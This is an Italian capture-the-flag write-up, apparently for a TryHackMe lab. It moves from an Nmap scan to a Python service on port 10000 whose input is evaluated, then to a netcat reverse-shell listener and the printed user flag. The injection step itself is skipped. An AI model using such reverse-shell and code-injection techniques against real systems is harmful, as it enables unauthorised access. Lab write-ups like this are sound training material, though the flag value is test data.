user.txt
Iniziamo subito con una scansione (tool Nmap) che rivela 2 porte aperte, SSH in esecuzione sulla porta 22 e un processo sconosciuto sulla porta 10000.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 78:c4:40:84:f4:42:13:8e:79:f8:6b:e4:6d:bf:d4:46 (RSA)
| 256 25:9d:f3:29:a2:62:4b:24:f2:83:36:cf:a7:75:bb:66 (ECDSA)
|_ 256 e7:a0:07:b0:b9:cb:74:e9:d6:16:7d:7a:67:fe:c1:1d (ED25519)
10000/tcp open snet-sensor-mgmt?
| fingerprint-strings:
| GenericLines:
| Private 0days
| Please enther number of exploits to send??: Traceback (most recent call last):
| File "./exploit.py", line 6, in <module>
| num_exploits = int(input(' Please enther number of exploits to send??: '))
| File "<string>", line 0
| SyntaxError: unexpected EOF while parsing
| GetRequest:
| Private 0days
| Please enther number of exploits to send??: Traceback (most recent call last):
| File "./exploit.py", line 6, in <module>
| num_exploits = int(input(' Please enther number of exploits to send??: '))
| File "<string>", line 1, in <module>
| NameError: name 'GET' is not defined
| HTTPOptions, RTSPRequest:
| Private 0days
| Please enther number of exploits to send??: Traceback (most recent call last):
| File "./exploit.py", line 6, in <module>
| num_exploits = int(input(' Please enther number of exploits to send??: '))
| File "<string>", line 1, in <module>
| NameError: name 'OPTIONS' is not defined
| NULL:
| Private 0days
|_ Please enther number of exploits to send??:
Se proviamo a connetterci nella porta 10000 il browser da un errore dove il programma nascosto si chiama exploit.py.
Questo è l'errore:
Please enther number of exploits to send??: Traceback (most recent call last):
File "./exploit.py", line 6, in <module>
num_exploits = int(input(' Please enther number of exploits to send??: '))
File "<string>", line 1, in <module>
NameError: name 'GET' is not defined
Connettiamoci con telnet, lo script python richiede un numero ed esegue una sorta di ** ping dove "**" è il numero che abbiamo fornito.
$ telnet 10.10.135.158 10000
Trying 10.10.135.158...
Connected to 10.10.135.158.
Escape character is '^]'.
Private 0days
Please enther number of exploits to send??: 4
Exploit started, attacking target (tryhackme.com)...
Exploiting tryhackme internal network: beacons_seq=1 ttl=1337 time=0.064 ms
Exploiting tryhackme internal network: beacons_seq=2 ttl=1337 time=0.032 ms
Exploiting tryhackme internal network: beacons_seq=1 ttl=1337 time=0.023 ms
Exploiting tryhackme internal network: beacons_seq=2 ttl=1337 time=0.164 ms
Connection closed by foreign host.
Sulla VM (del sito), il listener riceve un feedback e abbiamo una shell inversa:
unknown@parrot:/data/vpn$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.9.0.54] from (UNKNOWN) [10.10.135.158] 38628
SHELL=/bin/bash script -q /dev/null
king@ubuntu:~$
Apriamo il file e otteniamo la flag:
king@ubuntu:~$ ls -la
ls -la
total 324
drwxr-xr-x 4 king king 4096 Aug 27 2019 .
drwxr-xr-x 3 root root 4096 Aug 25 2019 ..
-rw------- 1 root root 2929 Aug 27 2019 .bash_history
-rw-r--r-- 1 king king 220 Aug 25 2019 .bash_logout
-rw-r--r-- 1 king king 3771 Aug 25 2019 .bashrc
drwx------ 2 king king 4096 Aug 25 2019 .cache
-rwxrwxrwx 1 king king 272113 Aug 27 2019 credentials.png
-rwxrwxrwx 1 king king 408 Aug 25 2019 exploit.py
drwxrwxr-x 2 king king 4096 Aug 25 2019 .nano
-rw-rw-r-- 1 king king 5 Jul 2 11:25 .pid
-rw-r--r-- 1 king king 655 Aug 25 2019 .profile
-rw-r--r-- 1 root root 32 Aug 25 2019 root.sh
-rw-rw-r-- 1 king king 139 Aug 25 2019 run.sh
-rw-r--r-- 1 king king 0 Aug 25 2019 .sudo_as_admin_successful
-rw-rw-r-- 1 king king 33 Aug 27 2019 user.txt
-rw-r--r-- 1 root root 183 Aug 25 2019 .wget-hsts
king@ubuntu:~$ cat user.txt
cat user.txt
cf85ff769cfaaa721758949bf870b019
USER FLAG: cf85ff769cfaaa721758949bf870b019